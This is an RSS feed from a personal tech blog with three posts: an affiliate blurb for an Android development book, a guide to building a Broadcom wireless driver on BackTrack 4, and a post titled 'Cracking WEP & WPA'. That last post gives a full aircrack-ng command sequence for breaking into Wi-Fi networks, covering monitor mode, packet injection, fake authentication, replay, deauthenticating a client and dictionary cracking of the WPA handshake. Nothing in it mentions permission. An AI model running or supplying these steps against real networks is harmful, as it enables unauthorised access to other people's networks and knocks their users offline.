<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>HydTech &#187; wireless</title>
	<atom:link href="http://hydtechblog.com/tag/wireless/feed/" rel="self" type="application/rss+xml" />
	<link>http://hydtechblog.com</link>
	<description>anotha hyd anotha day</description>
	<lastBuildDate>Tue, 07 Sep 2010 19:27:55 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Android Wireless Application Development [Paperback]</title>
		<link>http://hydtechblog.com/2010/06/06/android-wireless-application-development-paperback/</link>
		<comments>http://hydtechblog.com/2010/06/06/android-wireless-application-development-paperback/#comments</comments>
		<pubDate>Sun, 06 Jun 2010 20:10:49 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[Android]]></category>
		<category><![CDATA[Application]]></category>
		<category><![CDATA[Development]]></category>
		<category><![CDATA[Paperback]]></category>
		<category><![CDATA[wireless]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/2010/05/26/android-wireless-application-development-paperback/</guid>
		<description><![CDATA[










  The start-to-finish guide to Android development–from concept to market!     Android Wireless Application Development combines all the reliable information, sample code, and best practices you need to build, distribute, and market successful Android mobile applications. Drawing on their extensive experience with mobile and wireless development, Shane Conder and Lauren Darcey cover [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.amazon.com/Android-Wireless-Application-Development-Conder/dp/0321627091/ref=sr_1_3/192-3928737-5230424?ie=UTF8&#038;s=books&#038;qid=1273293851&#038;sr=8-3?ie=UTF8&#038;tag=hydtechblog.com-20"><img style="float:left;width: 150px;height:150px;margin-right: 10px;" src="http://ecx.images-amazon.com/images/I/41w7teq%2BZkL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" alt="Android Wireless Application Development" /></a></p>
<p>  The start-to-finish guide to Android development–from concept to market!     Android Wireless Application Development combines all the reliable information, sample code, and best practices you need to build, distribute, and market successful Android mobile applications. Drawing on their extensive experience with mobile and wireless development, Shane Conder and Lauren Darcey cover everything you need to execute a successful Android project: from concept and design through cod <a href="http://www.amazon.com/Android-Wireless-Application-Development-Conder/dp/0321627091/ref=sr_1_3/192-3928737-5230424?ie=UTF8&#038;s=books&#038;qid=1273293851&#038;sr=8-3?ie=UTF8&#038;tag=hydtechblog.com-20" title="More at Amazon">(more&#8230;)</a></p>
<img src="http://hydtechblog.com/?ak_action=api_record_view&id=816&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2010/06/06/android-wireless-application-development-paperback/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to make the Broadcom 4312 Wireless driver work in BackTrack 4 on the Lenovo S10</title>
		<link>http://hydtechblog.com/2009/09/25/how-to-make-the-broadcom-4312-wireless-driver-work-on-the-lenovo-s10/</link>
		<comments>http://hydtechblog.com/2009/09/25/how-to-make-the-broadcom-4312-wireless-driver-work-on-the-lenovo-s10/#comments</comments>
		<pubDate>Fri, 25 Sep 2009 18:10:19 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Lenovo S10]]></category>
		<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[b43]]></category>
		<category><![CDATA[b43legacy]]></category>
		<category><![CDATA[backtrack 4]]></category>
		<category><![CDATA[bc43xx]]></category>
		<category><![CDATA[broadcom]]></category>
		<category><![CDATA[BT4]]></category>
		<category><![CDATA[wireless]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=485</guid>
		<description><![CDATA[This guide is adapted from Kazalku&#8217;s guide on remote exploit forums.  Thanks Kazalku.
Download this driver and transfer it with a USB or boot up into another OS on your multiboot and save it in the BT root folder from here.
Untar it:

tar -xvzf hybrid-portsrc-x86_32-v5_10_91_9-3.tar.gz
makefile:
make -C /lib/modules/`uname -r`/build M=`pwd`
Insert the modules:
modprobe ieee80211_crypt_tkip
insmod wl.ko
Now you should have [...]]]></description>
			<content:encoded><![CDATA[<p>This guide is adapted from Kazalku&#8217;s guide on remote exploit forums.  Thanks Kazalku.</p>
<p>Download this driver and transfer it with a USB or boot up into another OS on your multiboot and save it in the BT root folder from <a href="http://www.broadcom.com/support/802.11/linux_sta.php">here</a>.</p>
<p>Untar it:<br />
<code><br />
tar -xvzf hybrid-portsrc-x86_32-v5_10_91_9-3.tar.gz</code></p>
<p>makefile:<br />
<code>make -C /lib/modules/`uname -r`/build M=`pwd`</code></p>
<p>Insert the modules:<br />
<code>modprobe ieee80211_crypt_tkip<br />
insmod wl.ko</code></p>
<p>Now you should have the network Claimed.  you can check by:<br />
<code>lshw -C network</code></p>
<p>Bring it up:<br />
<code>ifconfig eth1 up</code></p>
<p>To load the module upon boot:<br />
<code><br />
cp wl.ko /lib/modules/`uname -r`/kernel/net/wireless<br />
depmod -a<br />
modprobe wl</code></p>
<p>Load the module at every startup:<br />
<code>kate /etc/modules</code></p>
<p>add the following and close the text editor:<br />
    ieee80211_crypt_tkip<br />
    wl</p>
<p>Load NetworkManager and Configure KnetworkManager:<br />
Type <code>NetworkManager</code> in a konsole and configure the wireless at the bottom right.</p>
<p>Delete the files you created in the root folder now that you dont need them.</p>
<img src="http://hydtechblog.com/?ak_action=api_record_view&id=485&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/09/25/how-to-make-the-broadcom-4312-wireless-driver-work-on-the-lenovo-s10/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Cracking WEP &amp; WPA with IBM Lenovo X60 &#8211; Basics</title>
		<link>http://hydtechblog.com/2009/09/14/cracking-wep-wpa-with-ibm-lenovo-x60-basics/</link>
		<comments>http://hydtechblog.com/2009/09/14/cracking-wep-wpa-with-ibm-lenovo-x60-basics/#comments</comments>
		<pubDate>Mon, 14 Sep 2009 05:43:21 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[fedora]]></category>
		<category><![CDATA[opensuse]]></category>
		<category><![CDATA[crack]]></category>
		<category><![CDATA[jaunty]]></category>
		<category><![CDATA[lenovo]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[wep]]></category>
		<category><![CDATA[wireless]]></category>
		<category><![CDATA[wpa]]></category>
		<category><![CDATA[x60]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=460</guid>
		<description><![CDATA[At first injection with the Intel pro wireless cards was impossible.  Then came the ipwraw driver.  Now, we no longer need the ipwraw as the iwl3945 card supports injection.  Most linux distros now ship with this driver.
Follow these steps for a succesful WEP crack in Ubuntu:
download necessary files
sudo apt-get install aircrack-ng
place card [...]]]></description>
			<content:encoded><![CDATA[<p>At first injection with the Intel pro wireless cards was impossible.  Then came the ipwraw driver.  Now, we no longer need the ipwraw as the iwl3945 card supports injection<a href="http://hydtechblog.com">.</a>  Most linux distros now ship with this driver.</p>
<p>Follow these steps for a succesful WEP crack in Ubuntu:</p>
<p>download necessary files<br />
sudo apt-get install aircrack-ng</p>
<p>place card in monitor mode<br />
sudo airmon-ng start wlan0</p>
<p>test injection<br />
sudo aireplay-ng -9 -e linksys -a 00:14:6C:7E:40:80  mon0<br />
(0% means injection not working)</p>
<p>capture data and write to file called output<br />
 sudo airodump-ng -c 9 &#8211;bssid 00:14:6C:7E:40:80 -w output mon0</p>
<p>fake authentication<br />
 sudo aireplay-ng -1 0 -e linksys -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0</p>
<p>replay mode<br />
 sudo aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0</p>
<p>run aircrack<br />
sudo  aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap</p>
<p>For WPA cracking follow this:</p>
<p>monitor mode<br />
sudo airmon-ng start wlan0</p>
<p>collect handshake<br />
sudo  airodump-ng -c 9 &#8211;bssid 00:14:6C:7E:40:80 -w psk mon0</p>
<p>deauth connected client<br />
sudo  aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0</p>
<p>cracking<br />
sudo aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap</p>
<p>These are just refreshers. For more help check www.aircrack-ng.org</p>
<img src="http://hydtechblog.com/?ak_action=api_record_view&id=460&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/09/14/cracking-wep-wpa-with-ibm-lenovo-x60-basics/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>
